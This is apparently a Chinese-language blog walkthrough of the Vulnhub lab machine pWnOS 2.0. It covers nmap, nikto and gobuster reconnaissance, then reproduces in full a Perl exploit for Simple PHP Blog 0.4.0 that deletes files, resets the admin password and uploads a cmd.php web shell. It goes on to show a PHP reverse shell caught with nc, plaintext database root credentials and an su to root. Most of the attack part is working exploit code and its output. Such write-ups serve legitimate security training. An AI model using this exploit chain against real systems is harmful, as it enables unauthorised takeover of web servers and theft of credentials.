0x00 入侵路徑

網頁目錄爆破(gobuster) → CMS弱點(Simple PHP Blog) → 上傳圖片漏洞getshell → sql組態洩漏

0x01 偵查

在啟動靶機後,需要在攻擊機輸入此指令,才能連的到靶機。不過要注意,如果攻擊機是vmware虛擬機,要先備份.vmx檔,如果之後攻擊機無法上網際網路,換回備份的檔案再重新建虛擬機即可。

sudo ifconfig eth0 10.10.10.101 up

在Vulnhub上,已知靶機IP固定為10.10.10.100

└─$ nmap -sP 10.10.10.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 06:19 EST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.100
Host is up (0.0046s latency).
Nmap scan report for 10.10.10.101
Host is up (0.00083s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 16.60 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -T4 -A -p- 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 06:20 EST
Nmap scan report for 10.10.10.100
Host is up (0.00088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
MAC Address: 00:0C:29:90:98:5E (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds

有開80 port,開網頁看看:

一如既往地nikto目錄爆破:

┌──(kali㉿kali)-[~]
└─$ nikto -h http://10.10.10.100        
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.100
+ Target Hostname:    10.10.10.100
+ Target Port:        80
+ Start Time:         2022-11-27 01:29:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ /info/: Output from the phpinfo() function was found.
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 8673 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time:           2022-11-27 01:29:56 (GMT-5) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

這裡是另一個目錄爆破的工具gobuster,除了指定IP以外,還可搭配字典檔跟掃特定副檔名,整理出來比nikto清新。

┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
└─$ gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,old,zip,gz,conf,cnf,js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,bak,js,old,zip,gz,conf,cnf
[+] Timeout:                 10s
===============================================================
2022/11/27 02:23:16 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 854]
/index.php            (Status: 200) [Size: 854]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]                                                                           
/login                (Status: 200) [Size: 1174]
/login.php            (Status: 200) [Size: 1174]
/register.php         (Status: 200) [Size: 1562]
/register             (Status: 200) [Size: 1562]
/info.php             (Status: 200) [Size: 49885]
/info                 (Status: 200) [Size: 49873]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]                                                                       
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]                                                                         
/activate.php         (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]                                                                         
/server-status        (Status: 403) [Size: 293]
Progress: 2204026 / 2205610 (99.93%)===============================================================
2022/11/27 02:31:11 Finished
===============================================================

從上面結果,知道有一個名叫blog的目錄,輸入網址進去看。如果blog是用某個現成的CMS,可能會有相對應的攻擊腳本。

檢視原始碼紅圈處,可以看出簡稱是sphpblog。

0x02 Get Shell

┌──(kali㉿kali)-[~]
└─$ searchsploit sphpblog
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Ex | php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multipl | php/webapps/4557.txt
SPHPBlog 0.4 - 'search.php' Cross-Site Scr | php/webapps/25423.txt
Sphpblog 0.8 - Multiple Cross-Site Scripti | php/webapps/29051.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

利用簡稱去找,結果不多,但是知道了全稱:Simple PHP Blog,用全稱再搜一次:

┌──(kali㉿kali)-[~/target-machine/pWnOSv2.0]
└─$ searchsploit Simple PHP Blog
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Insanely Simple Blog 0.4/0.5 - 'index.php' | php/webapps/30317.txt
Insanely Simple Blog 0.4/0.5 - Cross-Site  | php/webapps/30318.txt
Insanely Simple Blog 0.5 - SQL Injection   | php/webapps/5774.txt
Simple Blog PHP 2.0 - Multiple Vulnerabili | php/webapps/40518.txt
Simple Blog PHP 2.0 - SQL Injection        | php/webapps/40519.txt
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Ex | php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multipl | php/webapps/4557.txt
Simple PHP Blog 0.4 - 'colors.php' Multipl | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Mu | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi. | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s  | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Exe | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command E | php/webapps/1581.pl
Simple PHP Blog 0.5.1 - Local File Inclusi | php/webapps/10604.pl
Simple PHP Blog 0.5.x - 'search.php' Cross | php/webapps/33507.txt
Simple PHP Blog 0.8.4 - Cross-Site Request | php/webapps/40475.txt
SimpleBlog 2.0 - 'comments.asp' SQL Inject | php/webapps/2232.pl
SimpleBlog 3.0 - Database Disclosure       | php/webapps/7232.txt
Super Simple Blog Script 2.5.4 - 'entry' S | php/webapps/9180.txt
Super Simple Blog Script 2.5.4 - Local Fil | php/webapps/9179.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

可是不知道版本,再仔細檢查原始碼,可以發現是屬於0.4.0

所以是1191跟16883這兩個可以用,不過第二個是rb檔,大概要配著metasploit用。先挑第一個用用看。

└─$ cat 1191.pl
#!/usr/bin/perl -w
#===============================================================================
#       Title:          sphpblog_vulns.pl
#
#       Written by:     Kenneth F. Belva, CISSP
#                       Franklin Technologies Unlimited, Inc.
#                       http://www.ftusecurity.com
#
#       Date:           August 25, 2005
#
#       Version:        0.1
#
#       Description:    This program is for educational purposes only!
#                       SimplePHPBlog as a few vulnerability which this
#                       perl script demonstrates via an exploit.
#
#       Instructions:   Should be self-explanatory via the .pl help menu
#
#       Solutions:
#                       *** Solution 1
#                       Change the line in comment_delete_cgi.php from
#                       $logged_in = logged_in( false, true );    to
#                       $logged_in = logged_in( true, true );
#
#                       *** Solution 2
#                       Place an .htaccess file with the following config in
#                       the ./config directory:
#
#
#                       #---------------------
#                       #Snip .htaccess start
#                       #---------------------
#                       IndexIgnore *
#
#                       <Files .htaccess>
#                       order allow,deny
#                       deny from all
#                       </Files>
#
#                       <Files *.txt>
#                       order allow,deny
#                       deny from all
#                       </Files>
#                       #---------------------
#                       #Snip .htaccess end
#                       #---------------------
#
#
#                       *** Solution 3
#                       See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
#                               for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
#       Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
#       Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
                   $unix="0"; #windows system
            }else{
                    $unix="1"; #unix system
            }

#-------------------------------------------------------------------------------
#       The Main Menu
#-------------------------------------------------------------------------------

sub menu()
    {
            if ($unix){system("clear");}
                else{system("cls");}

            print "
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : $0
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.

        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
                  NOT HAVE PERMISSION TO DO SO!

                  Please see this script comments for solution/fixes
                  to demonstrated vulnerabilities.
                  http://www.simplephpblog.com

        Usage   : $0 [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1
        ";

        exit;
    }


#-------------------------------------------------------------------------------
#       Initial Routine
#-------------------------------------------------------------------------------

    sub init()
    {

        use Switch;

        # colon ':' after letter says that option takes variable
        my $opt_string = 'e:U:P:h:F:?';
        getopts( "$opt_string", \%args ) or menu();

        #Load parameters
        my $exploit = $args{e};
        my $host = $args{h};
        my $user = $args{U};
        my $pass = $args{P};
        my $file = $args{F};

        # What shall we do today?
        switch (%args) {
                case "?"        { menu();}
                case "e"        {
                                switch ($exploit) {

                                        if ($unix){system("clear");}
                                        else{system("cls");}

                                        print "
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________";


                                        # Upload cmd.php to /images
                                        case "1" {      print "\nRunning cmd.php Upload Exploit....\n\n";
                                                        &UploadCmdPHP($host);}
                                        # Retrieve Username & Password hash
                                        case "2" {      print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
                                                        &RetrievePwd($host."/config/password.txt");}
                                        # Replace Username and Password
                                        case "3" {      print "\nRunning Set New Username and Password Exploit....\n\n";
                                                        &SetUserPwd($host,$user,$pass);}
                                        # Delete a System File
                                        case "4" {      print "\nRunning Delete System File Exploit....\n\n";
                                                        &DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

                                        } #end $exploit switch
                                        print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
                                } #end "e" case
                else            { menu();}
                } #end %args switch

    } #end sub init

#-------------------------------------------------------------------------------
#       Exploit #1: Upload File Via POST
#-------------------------------------------------------------------------------

sub UploadCmdPHP {


        my($url) = @_;

        use LWP;
        use HTTP::Request::Common qw(POST);
        my $ua = LWP::UserAgent->new;

        $HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

        #Step 1: Retrieve hash
        #-----------------------------------------------------------------------
        my $hash = &RetrievePwd($url."/config/password.txt");


        #Step 2: Delete Existing Password file (SetUserPwd)
        #Step 3: Create a temporary user id and password (SetUserPwd)
        #-----------------------------------------------------------------------
        &SetUserPwd($url,"a","a");


        #Step 4: Log into the app and get the PHPSession / my_id session variable
        #-----------------------------------------------------------------------
        my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));


        #Step 5: Create and upload our scripts (cmd.php & reset.php)
        #-----------------------------------------------------------------------
                &CreateTempPHPs();

        # Upload cmd.php
        my $path = "./cmd.php";
        my $file = "cmd.php";
        my $req = POST($url."/upload_img_cgi.php",
                Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
                Content_Type => 'form-data',
                Content => [userfile => [$path,$file],],
                );

        my $response = $ua->request($req);
        print "\nCreated cmd.php on target host: " . $url;
        #$response->is_success or die "Failed to POST '$url': ", $response->status_line;
        #return $response->as_string;

        # Upload reset.php
        $path = "./reset.php";
        $file = "reset.php";

        $req = POST($url."/upload_img_cgi.php",
                Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
                Content_Type => 'form-data',
                Content => [userfile => [$path,$file],],
                );

        $response = $ua->request($req);
        print "\nCreated reset.php on target host: " . $url;
        #$response->is_success or die "Failed to POST '$url': ", $response->status_line;
        #return $response->as_string;

                #Remove local PHP files
                &RemoveTempPHPs();


        #Step 6: Reset origional Passwpord
        #-----------------------------------------------------------------------
        &ResetHash($url."/images/reset.php",$hash);


        #Step 7: Pass command to delete reset.php (clean up)
        #-----------------------------------------------------------------------
        &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
        print "\nRemoved reset.php from target host: " . $url;

        print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
#       Exploit #2: Retrieve Password File
#-------------------------------------------------------------------------------

sub RetrievePwd {

        my($url) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = GET($url);

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        my $hash = $response->content;
        print "\nRetrieved Username and Password Hash: " . $hash;
        return $hash

}


#-------------------------------------------------------------------------------
#       Exploit #3: Set New Username and Password
#-------------------------------------------------------------------------------

sub SetUserPwd{

        my($url,$user,$pass) = @_;

        &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
        &ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
#       POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {

        my($url,$user,$pass) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ user  => $user,
                        pass => $pass,
                        submit => '%C2%A0Submit%C2%A0'
                        ]
                );

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        print "\n./config/password.txt created!";
        print "\nUsername is set to: ".$user;
        print "\nPassword is set to: ".$pass;

}


#-------------------------------------------------------------------------------
#       Exploit #4: Delete Password File
#-------------------------------------------------------------------------------

sub DeleteFile {

        my($url,$file) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = GET($url.$file);

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;
        print "\nDeleted File: ".$file;

}


#-------------------------------------------------------------------------------
#       log into site
#-------------------------------------------------------------------------------

sub Login {

        my($url,$user,$pass) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ user  => $user,
                        pass => $pass,
                        submit => '%C2%A0Submit%C2%A0'
                        ]
                );

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        print "\nLogged into SimplePHPBlog at: ".$url;
        print "\nCurrent Username '".$user."' and Password '".$pass."'...";

        return $response->header('Set-Cookie');

}


#-------------------------------------------------------------------------------
#       POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

        my($url,$hash) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ hash  => $hash]
                );

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        print "\nReset Hash at: ".$url;
        print "\nReset Hash value: ".$hash;


}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

        my($hash) = @_;

        open(PHPFILE, ">./cmd.php");
        print PHPFILE &CreateCmdPHP();
        close PHPFILE;
        print "\nCreated cmd.php on your local machine.";

        open(PHPFILE, ">./reset.php");
        print PHPFILE &CreateResetPHP();
        close PHPFILE;
        print "\nCreated reset.php on your local machine.";
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

        unlink("./cmd.php");
        print "\nRemoved cmd.php from your local machine.";
        unlink("./reset.php");
        print "\nRemoved reset.php from your local machine.";

}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {

        my($savedata) = @_;

        my $PHPstring = "PHPSESSID";
        my $semi = "\;";

        my $datalength = length($savedata);
        my $PHPstart= (index $savedata, $PHPstring)+10;
        my $PHPend = index $savedata,$semi,$PHPstart;
        my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
        return $PHPsession;

}


sub CreateCmdPHP(){

        return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end

}


sub CreateResetPHP(){

        return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}


#------------------------------------------------------
#       Begin Routines
#------------------------------------------------------
        init();

# milw0rm.com [2005-09-01]

上面落落長,但重點是這支攻擊腳本的使用說明:

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : $0
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.

        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
                  NOT HAVE PERMISSION TO DO SO!

                  Please see this script comments for solution/fixes
                  to demonstrated vulnerabilities.
                  http://www.simplephpblog.com

        Usage   : $0 [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1

先使用第三個,創建新帳號看看。這裡創建帳密都是admin的帳號:

┌──(kali㉿kali)-[~]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)

┌──(kali㉿kali)-[~]
└─$

到登入頁面試試:

登入成功:

有一個可以上傳圖片的,試試看能不能上傳reverse shell:

但上傳前要先編輯一下:

┌──(kali㉿kali)-[~]
└─$ sudo vim /usr/share/webshells/php/php-reverse-shell.php
[sudo] password for kali:

紅圈處IP改成攻擊機IP,下一行port是1234,要記一下:

上傳頁面

到目錄(怎麼知道這目錄的?),的確可以看到剛剛上傳的檔案:

先在攻擊機監聽1234 port,再去點剛剛上傳的檔案,即可get shell:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.100] 59016
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 14:27:57 up  1:05,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")' 
www-data@web:/$

0x03 提權

翻找可提權的資訊,比如資料庫帳密,sudo -l之類可以用root權限編輯什麼重要檔案之類。

ToDo: 常見sql設定檔在哪?

www-data@web:/$ ls
ls
bin   dev  home        lib    lost+found  mnt  proc  sbin     srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  selinux  sys  usr  vmlinuz
www-data@web:/$ pwd
pwd
/
www-data@web:/$ cd /var
cd /var
www-data@web:/var$ ls
ls
backups  crash       lib    lock  mail                opt  spool  uploads
cache    index.html  local  log   mysqli_connect.php  run  tmp    www
www-data@web:/var$ cd www
cd www
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

上面/var/www資料夾裡的mysqli_connect裡面的帳密是錯誤的,/var資料夾裡的mysqli_connect裡面的帳密才是正確的:

www-data@web:/var/www$ cd ..
cd ..
www-data@web:/var$ ls
ls
backups  crash       lib    lock  mail                opt  spool  uploads
cache    index.html  local  log   mysqli_connect.php  run  tmp    www
www-data@web:/var$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

利用root帳密登入:

www-data@web:/var$ cd
cd
bash: cd: HOME not set
www-data@web:/var$ su -
su -
Password: root@ISIntS

root@web:~# ls
ls
root@web:~# ls -al
ls -al
total 32
drwx------  4 root root 4096 2011-05-09 19:25 .
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ..
drwx------  2 root root 4096 2011-05-07 15:12 .aptitude
-rw-r--r--  1 root root  107 2011-05-09 19:29 .bash_history
-rw-r--r--  1 root root 3106 2010-10-21 08:47 .bashrc
drwx------  2 root root 4096 2011-05-07 17:18 .cache
-rw-r--r--  1 root root    0 2011-05-09 19:24 .mysql_history
-rw-r--r--  1 root root  140 2010-10-21 08:47 .profile
-rw-------  1 root root  837 2011-05-09 19:16 .viminfo
root@web:~# whoami
whoami
root

Reference

Vulnhub-靶机-PWNOS: 2.0 (PRE-RELEASE) - 皇帽讲绿帽带法技巧 - 博客园

VulnHub-pWnOS: 2.0-靶机渗透学习

pWnOS:2.0 Vulnhub Walkthrough

子域名挖掘的新操作(gobuster)


#attack #Vulnhub #port 80網頁入侵 #gobuster #Simple PHP Blog(sphpblog) 0.4.0 #1191 #16883 #圖片上傳 #php reverse shell #mysqli_connect.php







Related Posts

JS30 Day 29 筆記

JS30 Day 29 筆記

Leetcode 刷題 pattern - 美國軟體工程師求職有趣經驗

Leetcode 刷題 pattern - 美國軟體工程師求職有趣經驗

GitHub note

GitHub note


Comments